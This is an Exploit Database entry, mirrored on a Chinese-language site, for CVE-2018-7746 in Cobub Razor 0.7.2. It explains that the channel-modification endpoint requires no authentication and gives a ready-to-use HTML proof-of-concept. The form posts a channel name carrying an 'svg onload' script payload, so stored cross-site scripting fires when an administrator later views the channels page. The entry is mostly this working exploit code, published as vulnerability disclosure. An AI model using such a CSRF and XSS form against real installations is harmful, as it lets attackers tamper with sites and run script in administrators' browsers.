Cobub Razor 0.7.2 – Cross-Site Request Forgery

• Exploit Database
• 16 阅读

• 作者： ppb
  日期： 2018-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44416/

• # Exploit Title: Cobub Razor 0.7.2 Cross Site Request Forgery
  # Date: 2018-03-07
  # Exploit Author: ppb
  # Vendor Homepage: https://github.com/cobub/razor/
  # Software Link: https://github.com/cobub/razor/
  # Version: 0.72
  # CVE : CVE-2018-7746
  
  There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.
  
  
  <html>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
  <input type="hidden" name="channel_id" value="979" />
  <input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
  <input type="hidden" name="platform" value="1" />
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>